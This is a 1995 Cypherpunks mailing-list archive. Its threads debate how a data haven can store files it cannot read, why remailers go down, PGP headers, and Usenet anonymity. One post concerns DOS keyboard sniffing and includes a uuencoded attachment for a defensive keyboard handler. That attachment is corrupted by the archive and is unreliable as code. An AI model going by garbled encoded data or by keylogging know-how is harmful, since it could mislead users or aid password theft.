If the server automatically deletes the file upon return, he can't even tell what's in it then. Further, an "authority" won't gain anything by seizing the data. >It seems far more >complicated than it need be. As best I can tell, none of the previous suggestions guarantees that the file is unreadable. How would you accomplish that in a simpler manner? Or would you, as the operator of a data haven, not mind the risk of somebody designing an illegal file that passes all your filters and tipping off the police that you've got such a file on your computer, available to all--for sale, even? If there were a weakness in your filter, somebody could easily exploit that weakness and get the use of your haven. With my system, they could send you anything they liked, but it'd be little more than a cash donation, as they'd never get it back. Your liability would be the same as if the person had just emailed you the file and blew the whistle. > Alice sends a file to Dave's DataHaven. When Alice wants her file back, she > sends to Dave a secure hash of the file, a key with which to decrypt it, > and a handful of plaintext at the beginning of the file. Dave decrypts the > file that matches the hash with the key Alice gave him; if the file begins > as Alice says it should, Dave returns the file to Alice. > >Eric b& -- Ben.Goren at asu.edu, Arizona State University School of Music Finger ben at tux.music.asu.edu for PGP public key ID 0xCFF23BD5. From rrothenb at libws4.ic.sunysb.edu Fri Jan 13 12:34:44 1995 From: rrothenb at libws4.ic.sunysb.edu (Robert Rothenberg) Date: Fri, 13 Jan 95 12:34:44 PST Subject: Keyboard sniffing in DOS Message-ID: <9501132033.AA17462@toad.com> wrote: : For Dos operating systems. [..] : But, here it is, the source code for a keyboard sniffer program. [..] : Then, test it out with pgp or other dos based programs that ask : you for a password (use a fake one), and you will probably see : how insecure most of these programs are. 
: Mike I've thought about that problem too for terminal as well as crypto, (after seeing an article in 2600 about sniffing a roommate's passwords to the "K00L EL1T3 B0ARDZ") and started on a small "secure" keyboard handler. Here it is, though in very incomplete form. It ignores Pause, Cntl-Break and PrintScreen and doesn't make an annoying noise when the buffer is full, and may not work entirely for enhanced keyboards (since I do not own one to test it on). There's plenty of room for improvement in this, I'm sure... It does have some features like random-noise sampling, "SuperKey" codes and multiple keypress maps (as well as an option to hook into Interrupt 0x16 if security isn't a priority). The interface is in Turbo Pascal because I haven't made the migration to C yet (don't flame). Any help with fix-ups, improvements a C-interface and constructive suggestions would be appreciated. I've tested it with KeyTrap and it *seems* safe from such monitoring trojans.... Rob PGP Key ID = 0xab1f4831
at 3@U2!Q2*P8VPX[>8YTPBV1 at O59@\;?30WY':V M*59"#"+VB*5D%Y0341+_KK*"J+`N&44)I_O$.^8)E"^8E['-%F6H`K6R MK%*:GS6AP_ECX\>NI[S^6RK:#XW<$ST90X0\^):T-,'J@[V\D;JA9+F%Q<@L M]U8L6(<7,XO1J?=DE9KNR;]6JU)/@2GA_YU at L9,\#EX`)L]]Y8/5#55-IL"P M$H&_7ZQY)$0M82H[X5\':XM4BAOHPACW/XHM^[;F*V^&N@[9-M_J/:6M'@IS MF=2NU+R\IZJOZ42_YCB+;V85EXSN*JJ7GKS*ZHI4FKR9DWQ>2*KOD'K8R M2?M0G4&9(BDZ29^77P;!;51X]T7YHE#HIO)'B6\E<6'NU(6UUA,,[M5:*1U0 ML/C?]JZ\NVWCB/_?]_H=8+4I29=D`?`4Y2/R(4>M+#FR':=)W18$(1$V23`$ M:5ON\=D[,[L+[`*[(*E*IM\+F,RS2&"OV6-F=F=_HRDS,=L,FJPH4CS7%\ET MUP;JKD7%YK$_X=%+L^2BY]+0*`-_\0]9#3#J;C,`V+KXGZU..XG_:;L4_ZO3 M<\KX7V7\SS(&4!D#:&?Q/VFC!97,+Q/_\\`0`'0W\3]O(@)HRR5='/K?BR.* M/6'%\&:SV:2FO'[Y]/STR:/C5R]UE9!VMH;A,B9 at IL`;X>`A7]LRN.B-?&+O MXK;%_UKYW^XE\M^U6VV4_RV8K*7\+^5_*?]+^;^S^-^P-*:02M=7`KZV^-^W M'=P[O!@%%U9>RS#+ZV]P(!,.T8"XCDH7'T"G9Z\H[&FZY^9TQW?,637A+=/3 M8`8+BCGIKU*?6`V#Q:[EO^NP^-^VV^IV7+>,_UW*_U+^E_)_Y_)?7(^^`?O? M(/YW(O\WLO]O5T4H3?2OY0.R'UV]FE//WY7\;W5QSY_)?]OMT?Y_JUW:_Z7\ M+^5_*?]W(/^9^'].,1AESUL44ML*?V;]'XB;30.L?O7D[(?#DWOWSY\^NW?_ MNV/XNU:WWJVF$PRWN`U%G^>'C\_/Z'S]Z;.Z13G4+4I<3],H M(O;D[/'A";D`_9AY(AR?I+PR;XAK`^O24 at 6R:3U36N'4Q[WZTFI_^^,@[Y#\ M7+#N5.(=NG6MX=_IV:N4A:<2#XM9F":[+J\VS*.09\8\!$.$5[S:(M6OYR#Q MG1^@8\6"@,3CU+ED'I%[B7&\G&+RK.XFKG>0[[^;\WVWJHK*&/P".F(-5YO< M[RVWAE6Q at Y=CF<-&&<[$;_<^P>]_]` M_:_ET/Y/QVF7^E^I_Y7Z7ZG_[6[_!QV('\M^^@P.<\L-(/FF+%8572`X"Q!I MC.7HY]"5?.C;BT4TM1RWCQ7HV\SOH2Y=EH4U6P!V1C#TK-X^076BCK2*5WA+ M at UPX@U':@@_>9,6!RG2W#K3A8%)XHBQ^I[AU!BM>'4SW>L6IU"LN4`NH#=0! 
MZE:L`WRC8=L])56E!T_[0/M`-E`#Z'ZE;MM]H'U*U6_83D=-]0N\]1$H`%H` M+8&N@%9`(97E=!L at 2]14$3R=`_T,]!;*<%IUK'7%@^\QI7+;#1`_:JH1/+T` MN at 0:`[T#>@\T`3J at 5"T74NVKW("Q5/EGA>7_-WCS,]`G(!_H`Z5J`S?:&6X, MX>D,:`J$_S6!_L1SN(=PO>7QHGW M!)X>`3T#^@[HST!_`3H!&I at F7F4/GOZ73YE_P]\_`?T(]!CH!^/$>P1/3X&> M`]T#>@#TL"(/FG+B_?HF'M[.L=9./&UV+=LP\?)O.O2OPW(R3#S;@:*!P0?YMI,E03-HOI*)5Y"JG'@W/?%2X#;3 MY%,4QX:B:N*:2-WB0+?TU52R#7V&HVF]9&F`XFAZDD M6CP!/Q+.?:9#:4%-6:FYCLA`\N^QU`_2>">"2;W>F(9-O\W^[;7XO^R[\FJ' M/^JR?]U.)UM:]6Z-[%PPEX),NX2]QBOT))@\(`,^\E-]JEW11B[J;6&5MDEF;M at MGKI^\R*OK+BJW at 93)MF#J?W_O2,EVZ* M9P8#3ZG;_PGI,N(M;OZM/__MM+HN[?^UVR"-VNC_;7=[I?]7N?]7[O^5^W^[ MV_\[!'$Y"QL""0D;>SQ#_^/K[_]Y&!DG#O$FU%X<^"MHPM5>!C^/^#:DEJ&@ M]V#8("X9B)U4EJ2WPWDTGO1LKPJ,^A".<,\/AY4WA^_S18A"A[-0DDDX!5CI M;(^0T!5H,(D":LTT)K4(TJV+24T2-8*:./T*GF,DPFC[#5!^2R$QCBR$S7K`-_[]N@\\!(P%($U<;9: M\)\I_RN,([K`NV@>LEV/49#7;BA_+'&0`][#T`>.OO[.PP)4-\C-R=2?0H+R M!DCU%S\G]??Q!P&+H8%%8ZJ[JRA,#+0'6W?'JOYTA,-SA,NL1S`M-=%`1]]` M5]]`=TT#7=8NVQUH`3D4,!%+"HTM\$08ZI`!1R;DP)=4T.#_C"0-C73LL:Z1 M\//#`MSTHW1TB>ZYC'`Z\M_7E.GHRW2*RTQ'A%JF^+VX4+NC[\W.PZ((VD=V MA_=F9Y`#AT%L&?]3DBU5*29P2(2<08U$!SDB,->&G_*H;T/M^VQ6*/@Q!P)6 MTHIFICDA$$PR!0D$%7U9'*+I["CA%V,8 at C-950EPLO80S1%=%EKF"!DH2B]D M4#+(SU2^LVE$:%WIXH-H at 8N/B"3G3;".`=[*J9FRU0#*(,"FF%*=00&J;/;! M++CDBX62XVJ&8%F7L_`S+#8B=&H=@6*!BT5+5UZ8,)R8TNCD^+%L*ID+S-MR)@0X+2*P%2]# M:X,/HL.^A^4&@<./0=_"2\,4LNTH6G`#28:S-H%J4T[/0*N at KV<7W^O50]FE M=%-@['?\VI14JX)@$]F,%01M9OX9\;.Y[RHZ"3T;%.%GLS;730A^%QN.M8V! 
M`8OB,63'CQ[F+]FQ;S#317)SCEF(O^VC1EY_ADE6U>W-L-1$,Y6X\13;]0P0 MACXTX#CFL)SKX$?7@@5CE!-B"XY\.>?!QK.)V at N_<>#8-,N!LO&DJ\]MSPFE MPTW0ETS at L&`'BIRAC1#KAJ<#]QHL:*P8O<]XQ,HCMA^C?%T'$,_[+M=URJZ/ M at 6_9@C1\2PS37Y7]1W#84V^^0_NOW>JD]S\)"Q+LOVYI_Y7V7VG_E?;?[NR_ M'#F.G?K%5C5>XT1U; ME]XTB&N\L$7PRRI8#QG"'3Z6JR#!$I,5M+T];.@>5O!S ML(B*XX)+%4HVY-&NA[[`^IJ!].6HJ2\X/U/0=XQ*[X^]V67`N`YU:3B:G?)H MR9O"(T#RG&23%A4C]+T2'<[C+/D3WEK4`ZD#S!%:F.:4'35R?"X^:T5D<:@N MV__'NZ+T/LQT2-M at B:$Z8KK"+%A82J"@8H7QQ0(2'T*F0I-+?I!51B..EZSU M^['Y^ MIDZ=%C`<%%U3PN&M>+HUK3O_[4Z+W?]ME?@OI?Y?ZO^E_O]UZ/\\@"T6 MQ:/KL7![%*=D[5R0KO_BP,2`.^$TG&"D*ZQ^%`?,EPJ4;I"CYQ(>VJMP&BQL M/90;?MKV6/8PH]?YQ27MZRWE=::+L+""UO'Y][9%&5C7UD4.K.K0H^AJ;$S. M_24UH%I+7#=PY!/OFGXJP^>7<\MM=ILNK`ZKA0\&$,5?]?/-%^J>>5]=WENW ML at X[JH.0.2QD)FY04:2E?(EZ-QQSP&8ID*(XU$3[XL+0X_%X MH4WA&!J1OKW1`/DRC=AFP="/P-Y&B-3I^/%RH[$PZ6:#4LZTMPE&=L'HE+M* MSG?XZ0;67'Z"=JT5-TULKHSLX:@71VC3IV_\]CB]A6FV#?F*HCC'GY/>BNG?_AR'6'D,_(J_/D)WJ-2Z0XJ:P@:U?T5C]?3Z\UL0,MQ;^0AJ,CMSC4/U!^DIQCVE% M<#@S=]@DPK55+LN<@XFK9@=\4VQUW4+`_$+,/:=,J;M]W91Z-_/XAOWAZ-TJ M7CX&PW)I7%.V*TO-=,`;J&4J[2CGUDQ9_,BK)3/L<..6]6:#I<'2K6L:=LR" MC6:!,.VG7C@#JW^&`;Y8(7&`+OKAA.T?32)OI`Q1$;=+NL3&C/=TQ.'MM3`B MLYB'5P\_H\5#6R7,B[^.9UL739)\4L*A:0]? M]RL_6H&Z8OY#FI[2EZRI?60RLDW^.&MF,1_+NA+E$Q+9>TDZ3EIN.:;EP1LN M*W&*L>99EU$TLL)1X"'W/X9S97^'&/T1CS=PFQ+W;`R')%R`X_#0_`-CD$ M,QR$I7.PH+-UE2YOXY2?\E-^RL\N/_\#4$L!`A0`%``"``@`=S//&@M(9P<% M&P``D4<```<``````````0`@`````````&-O<'EI;F=02P$"%``4``(`"`!Y M`2X>+45;!A0*```%&```"P`````````!`"`````J&P``:V5Y:&%N9"YT>'10 M2P$"%``4``(`"``1G2T>]PY^DK<%````,```"P`````````!`"````!G)0`` M='!AJG\\`/DG````\```#``````` M```!`"````!'*P``:V)I Message-ID: <9501132038.AA17540@toad.com> > > Not to be paranoid, but did anybody receive that program? > > Does cypherpunkcs at toad.com have a pgp key? > > I think it was intercepted. > > mike > Yep, and I've already got a couple of other like it from other sources. I also posted a semi-solution to the problem. 
If it doesn't show up, let me know and I'll repost it. PGP Key available on request, or try keyservers (ID = 0xab1f4831) Rob From jya at pipeline.com Fri Jan 13 12:47:29 1995 From: jya at pipeline.com (John Young) Date: Fri, 13 Jan 95 12:47:29 PST Subject: NYT on MS Online Latest Message-ID: <199501132046.PAA07929@pipe3.pipeline.com> Peter Lewis writes today on latest MS Network online mighty joes, palming Uunet for hi-speed hookup and Mosaic and Spyglass for joetoe-jam web-peddling. See it by sending blank message with subject: NEB_wet From dmandl at bear.com Fri Jan 13 13:02:01 1995 From: dmandl at bear.com (dmandl at bear.com) Date: Fri, 13 Jan 95 13:02:01 PST Subject: Remailer@jpunix.com down!!!??? Message-ID: <9501131702.AA06825@yeti.bsnet> > From: "Joshua M. Sled" > Subject: Re: Remailer at jpunix.com down!!!??? > > On Fri, 13 Jan 1995, Samuel Kaplin wrote: > > > I just read that the remailer at jpunix.com went down suddenly and > > permanently. Anyone know what happened?? I also believe the whole site is > > down as it didn't answer my pings a couple of days ago. > > He was getting spam from AOL at the rate of 25 messages every 5 > seconds... so he took the system down. I missed the specifics of this the first time. How was the spammer doing it? Obviously he wasn't chaining his mail, or there'd be no way to know he was from AOL. Was JP unable to determine the guy's actual address? Or was he posting in the clear sans anonymity? Sorry if this has been covered already. I remember seeing the incident mentioned, but I can't recall the explanation of why JP was powerless to do anything about it. Thanks. --Dave. From lmccarth at thor.cs.umass.edu Fri Jan 13 13:47:10 1995 From: lmccarth at thor.cs.umass.edu (L. McCarthy) Date: Fri, 13 Jan 95 13:47:10 PST Subject: retiring my remailer.. 
(fwd) Message-ID: <199501132146.QAA13046@thor.cs.umass.edu> Forwarded message: From wcs at anchor.ho.att.com Fri Jan 13 14:06:27 1995 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Fri, 13 Jan 95 14:06:27 PST Subject: Multiple symetric cyphers Message-ID: <9501132200.AA00870@anchor.ho.att.com> > Actually, a slight correction. PGP does have an algorithm byte > for the encryption algorithm; this byte is inside the RSA block. It's got another algorithm byte - the stuff at the beginning that says --- BEGIN PGP ENCRYPTED MESSAGE ---, letting everyone know it's PGP. That's one of the major risks of "algorithm bytes" - not that it tells the Bad Guys which algorithm you're using, but that it tells them "yes, this is crypto, not just noise". Bill From sdw at lig.net Fri Jan 13 14:33:00 1995 From: sdw at lig.net (Stephen D. Williams) Date: Fri, 13 Jan 95 14:33:00 PST Subject: State of PGP dll?; Encrypted session projects In-Reply-To: <9501132200.AA00870@anchor.ho.att.com> Message-ID: What is the state of the Windows/.dll PGP libraries? Does anyone have a usable version yet? I've been thinking of trying to wedge pgp/encrypted session ability into some of the socket proxy programs out there. For Windows: twnsck12.zip, which is simple, is GNU, and has source and by writing a relatively simple windows serial terminal emulator and using Comt ($15 or 25 shareware) to convert it to a telnet client. Both of these could be modified fairly easily. I think Twinsock (Troy's winsock, twnsck12.zip) would be the first to work on, since it would cover whatever clients you would want to use. It also should tunnel through multiple telnets since by default it escapes just about everything. Term would be a good Unix-Unix equivalent target. Does anyone have better ideas? Any suggestions on login/key exchange sequence? sdw -- Stephen D. 
Williams 25Feb1965 VW,OH sdw at lig.net http://www.lig.net/sdw Senior Consultant 510.503.9227 CA Page 513.496.5223 OH Page BA Aug94-Dec95 OO R&D AI:NN/ES crypto By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430 Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.29Nov94 From mattt at microsoft.com Fri Jan 13 16:03:53 1995 From: mattt at microsoft.com (Matt Thomlinson) Date: Fri, 13 Jan 95 16:03:53 PST Subject: FW: How do I know if its encrypted? Message-ID: <9501140004.AA21059@netmail2.microsoft.com> ---------- From: To: Matt Thomlinson Subject: Re: How do I know if its encrypted? Date: Friday, January 13, 1995 12:27PM At 9:35 AM 1/13/95, Matt Thomlinson wrote: >make "handful of plaintext" - > "hash of the plaintext" and you've got >yourself >a decent system. :) > >(this way, alice can keep a hash of the plaintext, hash of the ciphertext, and >a key around for recovery, without keeping ANY plaintext. Also, for someone >to request the data, knowing part of the message won't work; now they've >got to know the entire message to recreate the hash. That would be a little more secure, but I'm thinking that the "handful of plaintext" would be a random number of some kind that the user prepends to the file before encrypting. This is kinder on the data haven's CPU; compare even 3DES of, say, 256 bits to IDEA of a few megabytes followed by MD5 of same. Plus, it offers the operator even more deniability: he doesn't even look at the whole file, but just enough to be sure that it's what it's supposed to be. Presumably, the data haven will specify how much a handful is, and offer a client program that generates all this automatically. >matt You sent this to me privately, so that's how I'm replying. If you don't mind, though, please forward this on to the list.
b& -- Ben.Goren at asu.edu, Arizona State University School of Music Finger ben at tux.music.asu.edu for PGP public key ID 0xCFF23BD5. From jsled at eis.calstate.edu Fri Jan 13 16:23:28 1995 From: jsled at eis.calstate.edu (Joshua M. Sled) Date: Fri, 13 Jan 95 16:23:28 PST Subject: C'punks slogan? Message-ID: Mostly because I'm looking at having bumper stickers made, and partly because I'm testing a procmail script :), I want a few suggestions for a good slogan for the C'punks, something that would look good on a bumper sticker... stuff I've come up with so far is like: sub rosa - Cypherpunks 1995 Support your local Cypherpunk Privacy isn't a crime (I think I stole that from somewhere) Ensuring privacy isn't a crime And that's about it.... you should see by now why I'm asking. :) Joshua M. Sled From pstemari at erinet.com Fri Jan 13 17:21:29 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Fri, 13 Jan 95 17:21:29 PST Subject: How do I know if its encrypted? Message-ID: <9501140112.AB29647@eri.erinet.com> At 09:17 PM 1/12/95 -0600, Larry E wrote: > ... > (1) the people who use the remailer, who get a measure of > comfort from knowing their communication is secure They know it's secure because they made it secure. If they don't care, I don't particularly see why the remailer should care. > (2) legal groups etc. who may try to hold the remailer > liable in some way for what passes through their remailer. It strikes me that this is a very weak defense. Legal beagles will probably argue that the remailer should have either prohibited encrypted communications or else was in collusion with the sending party. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From lmccarth at thor.cs.umass.edu Fri Jan 13 17:30:24 1995 From: lmccarth at thor.cs.umass.edu (L. McCarthy) Date: Fri, 13 Jan 95 17:30:24 PST Subject: C'punks slogan? - Private Replies s'il vous plait In-Reply-To: Message-ID: <199501140130.UAA26305@thor.cs.umass.edu> Joshua M. 
Sled , writes: > Mostly because I'm looking at having bumper stickers made, and partly > because I'm testing a procmail script :), I want a few suggestions for a > good slogan for the C'punks, something that would look good on a bumper > sticker... Lest we suffer a recurrence of the C'punks Logo thread, which generated a whole raft of list traffic which would have been better kept private, please reply directly to Joshua and not to the whole list. [He seems to imply that he wants private replies ("testing procmail") anyway, but I want to encourage this practice explicitly.] Thanks -L. Futplex McCarthy From eric at remailer.net Fri Jan 13 18:00:08 1995 From: eric at remailer.net (Eric Hughes) Date: Fri, 13 Jan 95 18:00:08 PST Subject: How do I know if its encrypted? In-Reply-To: Message-ID: <199501140158.RAA03820@largo.remailer.net> From: Ben.Goren at asu.edu That of the data haven operator being able to deny knowledge of the contents of files people send him. He'll only return files that, when operated on by a strong cryptographic algorithm, make sense. This idea doesn't work for the purpose intended. I'll upload straight ASCII. When you ask for a decryption key, I'll make one up randomly, apply the decryption algorithm to the flat text, and send that back to you as a confirmation. The real question is "Makes sense to whom?". You can't enforce a requirement of encryption, but you can make sure that you can't make sense of most of it. As best I can tell, none of the previous suggestions guarantees that the file is unreadable. You don't need a guarantee of unreadability. What is needed is a presumption that files were not read. If they are unreadable, then they weren't read, but there are other ways of creating that assurance. Eric From Ben.Goren at asu.edu Fri Jan 13 18:17:34 1995 From: Ben.Goren at asu.edu (Ben.Goren at asu.edu) Date: Fri, 13 Jan 95 18:17:34 PST Subject: How do I know if its encrypted?
Message-ID: At 6:58 PM 1/13/95, Eric Hughes wrote: > From: Ben.Goren at asu.edu > > That of the data haven operator being able to deny knowledge of the > contents of files people send him. He'll only return files that, when > operated on by a strong cryptographic algorithm, make sense. > >This idea doesn't work for the purpose intended. I'll upload straight >ASCII. When you ask for a decryption key, I'll make one up randomly, >apply the decryption algorithm to the flat text, and send that back to >you as a confirmation. >[. . .] Damn. I hate it when I overlook the obvious. Still, I'd like to think there's an answer. Perhaps I'll keep thinking on it. >Eric -- Ben.Goren at asu.edu, Arizona State University School of Music Finger ben at tux.music.asu.edu for PGP public key ID 0xCFF23BD5. From chen at intuit.com Fri Jan 13 18:33:06 1995 From: chen at intuit.com (Mark Chen) Date: Fri, 13 Jan 95 18:33:06 PST Subject: NIST Key Certification Document Message-ID: <9501140231.AA11480@doom> At the RSA conference, I came across an interesting-looking tome called _Federal Certification Authority Liability and Policy: Law and Policy of Certificate-Based Public Key and Digital Signatures_. It seems that we can obtain this thing from NIST for a modest fee of $61, but I'm wondering if there might be an online version around somewhere. Does anyone know? -- Mark Chen chen at intuit.com 415/329-6913 finger for PGP public key D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D From blancw at microsoft.com Fri Jan 13 18:44:02 1995 From: blancw at microsoft.com (Blanc Weber) Date: Fri, 13 Jan 95 18:44:02 PST Subject: Reefer madness Message-ID: <9501140244.AA29812@netmail2.microsoft.com> Thanks for your replies about the Turkish prison films, and all, I think I comprehendo now. I did see the movie Airplane, but I somehow overlooked that salient point.
Blanc From daleh at ix.netcom.com Fri Jan 13 19:00:20 1995 From: daleh at ix.netcom.com (Dale Harrison AEGIS) Date: Fri, 13 Jan 95 19:00:20 PST Subject: How do I know if its encrypted? Message-ID: <199501140259.SAA13236@ix3.ix.netcom.com> You wrote: > >Fine. The operator has no idea of how to make sense of this data >format. Just because someone in the world has an interpretation for >it doesn't mean that I do. > The primary point that I'm trying to make is that there is no such thing as an algorithmic test for a dataset being in a 'state' of encryption. Such a test is beyond algorithmic capability (at least in our universe). Therefore, an RM/DH operator should just drop the pretense of filtering out non-encyphered submissions. Just take what comes and tell customers that if they don't want you to read it, it's up to _them_ to make certain that you can't. Period! The DH operator could encypher all submissions with his own key so that the DH contents can't be compromised to outsiders. This seems to be a much more real-world approach to the problem than tilting at windmills with encryption filters. (The previous examples were an attempt to demonstrate, in a concrete way, the failure of any such algorithmic approach. Whatever encryption-test algorithm you come up with I guarantee you I can defeat it!) Dale H. From dcwill at python.ee.unr.edu Fri Jan 13 20:23:50 1995 From: dcwill at python.ee.unr.edu (Dr. D.C. Williams) Date: Fri, 13 Jan 95 20:23:50 PST Subject: How do I know if its encrypted? Message-ID: <199501140428.XAA14570@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- > From: daleh at ix.netcom.com (Dale Harrison (AEGIS)) > Paco begins by > inventing the new [format] of which only Paco knows the internals. Eric Hughes replied: > No operator of any data service can be expected to know about every > data interpretation. The key here is "good faith". An operator can > undertake a good faith effort to remain ignorant about content.
While this may be possible, the argument that someone actively tried to remain uninformed about something "dangerous" or potentially "illegal" doesn't seem like a particularly strong defense. Someone with proper credentials might want to comment on whether intentional ignorance is sufficient to avoid culpability. =D.C. Williams - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxdS6yoZzwIn1bdtAQHHYQF/Qe+7AcXH5ub+BMEY91hjbKNwGGUEho5o CN63jwJ4NQYBcLHwhhu9Q+b1wTE9hMrB =lSSE -----END PGP SIGNATURE----- From jpb at gate.net Fri Jan 13 20:38:20 1995 From: jpb at gate.net (jpb at gate.net) Date: Fri, 13 Jan 95 20:38:20 PST Subject: How do I know if its encrypted? Message-ID: <199501140437.XAA14922@hopi.gate.net> I accidentally sent a reply to Ben's letter solely to him. He responds here to the major points I brought up. I'm forwarding it here with his permission. Ben's text begins At 8:11 AM 1/13/95, jpb at gate.net wrote: >Ben.Goren at asu.edu said >> Here's a solution: >> >> Alice sends a file to Dave's DataHaven. When Alice wants her file back, she >> sends to Dave a secure hash of the file, a key with which to decrypt it, >> and a handful of plaintext at the beginning of the file. Dave decrypts the >> file that matches the hash with the key Alice gave him; if the file begins >> as Alice says it should, Dave returns the file to Alice. > >If Alice initially encrypts the file to herself, and then encrypts it to Dave >(Dave doesn't accept non-encrypted files), Dave doesn't need to decrypt it. >If Dave even *can* decrypt it, and makes a policy of decryption, he is >setting himself up for legal liability. > >Dave should allow anyone who can provide the MD5 of the cyphertext, the >fileid and the fee to retrieve the file. 
Retrieval requests will of course >also require a pgp key to encrypt the file to and an anonymous remailer block. I address this somewhat further in a response to Eric Hughes on the list. Basically, Dave wants to make sure that he can't see what's in the file. My scheme guarantees that the file is unreadable to anybody but the owner until the owner asks for it back. If return of the file is automated, Dave'll never know what's in it. Alice should, of course, further protect her data if she feels the need. >> This way, only those people who have an intimate knowledge of the files can >> recover them. > >I agree that this is a good thing to enforce. > >> Dave can have a policy whereby he deletes a file after returning it, unless >> Alice pays more to keep it there. Thus, Bad Bobby can send his naughty >> pictures to Dave, tell the 'net how to get them--but the first person who >> neglects to include the fee to leave the pictures there winds up blocking >> out everybody else. Similarly, Samaritan Sam could get into a spending war >> with Bobby. Each time Bobby sends Dave his smut, Sam retrieves the file >> without paying for its continued storage--and takes a sneak peek at the >> pictures before deleting them himself. > >This is a bad policy for Dave from a financial point of view. If Alice pays >for a 30 day storage, it should stay there for 30 days. This means that Dave >also needs to require an owner-password when the file is initially stored, >but that is no big deal. Change the payment structure a little and you don't have those worries. Alice doesn't pay for thirty day storage, but rather pays for at least thirty day storage. If she thinks she'll be getting the file back in fifteen days, she only pays for that long. If she needs it for longer than that, she sends another payment before the file expires. >In a perfect world, Alice could specify an extra retrieval charge over and >above Dave's, and the DH would enforce this and pass the extra money on to >Alice.
This would allow for information sale when neither party trusts the >other - Alice and Bob can agree on a fee for the file through anonymous means, >and once it is set, Bob can send in the cash and be sure the file will be >sent. That's the job of a data broker, not a data haven. Dave might well wish to offer that service, too, but, if I were him, I'd keep the two obviously separate. >Whether or not the file is what it is advertised to be is a whole >new problem that can't be solved securely in software. Not without an awfully good AI.... From ben at Tux.Music.ASU.Edu Fri Jan 13 21:06:55 1995 From: ben at Tux.Music.ASU.Edu (Ben Goren) Date: Fri, 13 Jan 95 21:06:55 PST Subject: How do I know if its encrypted? In-Reply-To: <199501140428.XAA14570@bb.hks.net> Message-ID: OK. If this isn't the solution, it at least makes it past Eric's last objection. Alice hashes her file and uses that hash as the key to encrypt the file. She sends the file to Dave, and sends the original hash when she wants it back. Dave decrypts, and confirms the hash. Unfortunately, this still doesn't quite close the loop--Dave knows the contents of the file once Alice sends the key. It does, however, make it very difficult for Dave to know anything about Alice's file. In a real-world implementation, Dave is going to want to get the file back to Alice as quickly as possible, since that's part of what she's paying for. Scanning the file as it leaves will slow down delivery--especially if it's "suspicious" and must get routed to a human--so it's uneconomical for Dave to do anything until later. Once he's returned the file, the deed has been done, and it does little good to know that Alice was hoarding plans to build a nuke, as she's got them back again--the cat's out of the bag. b& -- Ben.Goren at asu.edu, Arizona State University School of Music Finger ben at tux.music.asu.edu for PGP public key ID 0xCFF23BD5. From pstemari at erinet.com Fri Jan 13 22:08:55 1995 From: pstemari at erinet.com (Paul J. 
Ste. Marie) Date: Fri, 13 Jan 95 22:08:55 PST Subject: How do I know if its encrypted? Message-ID: <9501140600.AA07244@eri.erinet.com> At 10:07 PM 1/13/95, Ben Goren wrote: > ... Alice hashes her file and uses that hash as the key to encrypt the file. >She sends the file to Dave, and sends the original hash when she wants it >back. Dave decrypts, and confirms the hash. > >Unfortunately, this still doesn't quite close the loop--Dave knows the >contents of the file once Alice sends the key. It does, however, make it >very difficult for Dave to know anything about Alice's file. ... This seems overly complicated. If Dave has a known public key, then Alice should be able to hash her file, sign the hash, encrypt (the hash, her public key, and the file) with Dave's public key, and (anonymously) send the result to Dave's (encrypted) address. Dave then decrypts, verifies the sig, and stores the file, hash, and PK together, indexed by the hash. When Alice wants the file back, she signs (the hash and her encrypted return address), encrypts the result with Dave's key, and sends it off. Dave decrypts the request, fetches the public key based on the decrypted hash, verifies the signature, encrypts the file with Alice's provided public key, and sends it back to the encrypted return address. To avoid Dave's knowing the file contents, Alice can encrypt it before the described protocol and decrypt it afterwards. The protocol is subject to a replay attack, but the result of the replay would cause the file to be sent to the original sender and not to the replayer. The signed hash in the first step prevents people from spamming Dave with files that have Alice's public key. Alice only requires an encrypted address and public key for Dave, and Dave validates the retrieval request against the public sent in the first step. --Paul J. Ste.
Marie pstemari at well.sf.ca.us, pstemari at erinet.com From raph at netcom.com Fri Jan 13 23:00:33 1995 From: raph at netcom.com (Raph Levien) Date: Fri, 13 Jan 95 23:00:33 PST Subject: Draft of editorial to SF Chronicle Message-ID: <199501140623.WAA14448@netcom4.netcom.com> Chaos and Anonymity keep the Internet Vital I could not let Martha Siegel's editorial ("Anarchy, Chaos on the Internet Must End", 2 Jan 1995) go unchallenged. To the uninformed reader, her arguments may seem plausible. However, her distortions give a picture of the Internet quite at odds with the true nature of the Net. Her views are by no means representative of those who actually use the Net. Of the dozens of messages I saw in response to the editorial, not a single one was in favor of her proposals. As Ms. Siegel correctly points out, the Net is not governed by any one individual person or organization. Rather, it is collectively run by those who use it as part of their daily lives. The operation of each Internet node is subject to the individual judgement of the people who own it. Ms. Siegel is wrong, however, in believing that such a state of affairs is intolerable. Rather, this state of affairs has brought us a remarkable flowering of discourse, ideas and culture, which is just now beginning to be recognized in the mainstream press. In a lawyer's dream world, there is a rule covering every action in every situation, along with a well-functioning system to enforce the rules. This is the exact opposite of the spirit of the Net, and of Usenet in particular. Rather, there has evolved an informal set of guidelines for promoting open, civil discourse, collectively known as "netiquette." These guidelines may seem arcane to newcomers, but basically they simply ask people who use the Net to be considerate of other people, their time and their resources. A violation of netiquette brings on not legal action, but responses pointing out why the action was inconsiderate.
Continued violation brings on ridicule and scorn -- people who engage in this are considered to be either sociopathic or just obnoxiously self-promoting. The single most infamous breach of netiquette in Usenet history was almost certainly the "green card spam," in which thousands of advertisements for green card services were posted to completely unrelated message areas, or "newsgroups." Advertisements presented in a way considerate to others are tolerated and even welcomed on the Net. Posting thousands of copies, though, is just going too far. Negative response was immediate. The perpetrators were asked to stop, but they refused to. One Norwegian hacker took it upon himself to track down and "cancel" the offending messages. Most people on the Net considered this to be entirely appropriate. A number of other self-promoting hucksters have sensed an opportunity, and have performed similar spams. In response, the Net evolved a defense mechanism to counter these spams and minimize the damage. The person currently serving this role is known by the pseudonym "CancelMoose." Almost everyone on the Net supports this effort, and agrees that it improves the overall value of 